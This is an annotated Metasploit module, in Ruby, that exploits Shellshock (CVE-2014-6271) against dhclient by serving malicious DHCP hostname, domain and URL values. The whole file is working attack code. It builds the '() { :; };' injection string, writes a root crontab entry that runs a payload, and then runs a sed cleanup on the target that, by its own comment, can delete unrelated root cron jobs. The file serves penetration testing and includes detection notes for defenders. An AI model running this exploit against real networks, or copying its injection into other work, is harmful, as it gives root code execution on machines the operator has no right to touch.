Path: blob/master/modules/exploits/unix/dhcp/bash_environment.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Shellshock (CVE-2014-6271) delivered over DHCP. The module answers DHCP
# requests with DOMAINNAME/HOSTNAME/URL option values that start with a Bash
# function definition, so that dhclient's configuration scripts run the
# trailing command when the values are passed along as environment variables.
# That command appends an every-minute root entry to /etc/crontab, which
# #on_new_session removes again once a session exists.
#
# Defender notes, taken from the behaviour below: the on-disk artifact is a
# line beginning with "* * * * * root" in /etc/crontab (ARTIFACTS_ON_DISK),
# and each of the three DHCP option values begins with the literal
# "() { :; };" prefix.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Presumably supplies start_service, @dhcp and the DOMAINNAME/HOSTNAME/URL
  # datastore options that #initialize deregisters below - confirm in the mixin.
  include Msf::Exploit::Remote::DHCPServer

  # Registers module metadata. 'Space' => 200 keeps the encoded payload under
  # the 255-byte domain-name limit that #exploit enforces after hex-escaping
  # has expanded it.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',
        'Description' => %q{
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
          handles external environment variables. This module targets dhclient by responding
          to DHCP requests with a malicious hostname, domainname, and URL which are then
          passed to the configuration scripts as environment variables, resulting in code
          execution. Due to length restrictions and the unusual networking scenario at the
          time of exploitation, this module achieves code execution by writing the payload
          into /etc/crontab and then cleaning it up after a session is created.
        },
        'Author' => [
          'Stephane Chazelas', # Vulnerability discovery
          'egypt' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix'],
        'Arch' => ARCH_CMD,
        'References' => [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ],
          [ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],
          [ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
          [ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
        ],
        'Payload' => {
          # 255 for a domain name, minus some room for encoding
          'Space' => 200,
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic telnet ruby'
          }
        },
        'Targets' => [ [ 'Automatic Target', {}] ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-09-24',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
          'Reliability' => [REPEATABLE_SESSION],
          'AKA' => ['Shellshock']
        }
      )
    )

    # These three options are filled in programmatically by #exploit, so they
    # are hidden from the operator rather than left user-settable.
    deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')

    # NOTE(review): presumably signals the framework that this module's
    # cleanup (#on_new_session) must run - confirm against the framework.
    self.needs_cleanup = true
  end

  # Runs when a session is opened: deletes the crontab entry appended by
  # #exploit via `sed -i` on the target.
  #
  # @param session [Object] the new session; only shell_command_token is used
  def on_new_session(session)
    print_status 'Cleaning up crontab'
    # XXX this will brick a server some day: the pattern deletes every
    # /etc/crontab line that begins with "* * * * * root", not only the one
    # this module wrote, so any pre-existing every-minute root job is removed
    # as well.
    session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
  end

  # Builds the three DHCP option values and serves them until the DHCP
  # server thread exits.
  #
  # @raise [ArgumentError] when the DOMAINNAME value is longer than 255 bytes
  def exploit
    # Work on a copy so the module's own datastore is left untouched.
    hash = datastore.copy
    # Quotes seem to be completely stripped, so other characters have to be
    # escaped: each listed shell metacharacter is replaced by its
    # Rex::Text.to_hex form, which the `echo -e` below decodes again.
    p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
    # Five hex-escaped '*' fields give an every-minute schedule, followed by
    # the user "root" and the payload; the line is appended to /etc/crontab.
    echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"
    # "() { :; };" is the function-definition prefix after which a vulnerable
    # bash executes the rest of the variable's value.
    hash['DOMAINNAME'] = "() { :; };#{echo}"
    # The domain-name option is capped at 255 bytes (see 'Space' above).
    # HOSTNAME and URL receive the identical string, so this one check
    # covers all three values.
    if hash['DOMAINNAME'].length > 255
      raise ArgumentError, 'payload too long'
    end

    hash['HOSTNAME'] = "() { :; };#{echo}"
    hash['URL'] = "() { :; };#{echo}"
    # start_service is not defined in this file; presumably provided by the
    # DHCPServer mixin and given the modified option set.
    start_service(hash)

    # Block until the DHCP server thread (from the mixin) has terminated.
    sleep 2 while @dhcp.thread.alive?
  end
end